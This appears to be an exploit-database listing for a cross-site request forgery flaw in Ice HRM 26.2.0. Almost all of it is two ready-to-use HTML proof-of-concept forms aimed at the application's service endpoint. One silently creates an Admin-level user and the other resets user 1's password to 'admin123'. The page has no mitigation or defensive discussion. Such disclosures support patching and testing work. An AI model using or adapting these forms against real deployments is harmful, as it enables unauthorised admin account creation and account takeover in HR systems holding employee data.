Ice HRM 26.2.0 Exploit, Cross-Site Request Forgery (Add User)

# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://icehrm.com/
# Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0
# Tested on Windows 10/Kali Rolling

# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change:

# POC for user creation:
 
    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://HOSTHERE/icehrm/app/service.php">
          <input type="hidden" name="t" value="User" />
          <input type="hidden" name="a" value="ca" />
          <input type="hidden" name="sa" value="saveUser" />
          <input type="hidden" name="mod" value="admin=users" />
          <input type="hidden" name="req" value="{"username":"test","email":"test@test.com","employee":"1","user_level":"Admin","user_roles":"[\"2\"]","lang":"NULL","default_module":"NULL","csrf":"c0bdded55472fab56c578386143a1854e6f8dd11"}" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

#    POC for Password Change:

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://HOSTHERE/icehrm/app/service.php">
          <input type="hidden" name="t" value="User" />
          <input type="hidden" name="a" value="ca" />
          <input type="hidden" name="sa" value="changePassword" />
          <input type="hidden" name="mod" value="admin=users" />
          <input type="hidden" name="req" value="{"id":1,"pwd":"admin123"}" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD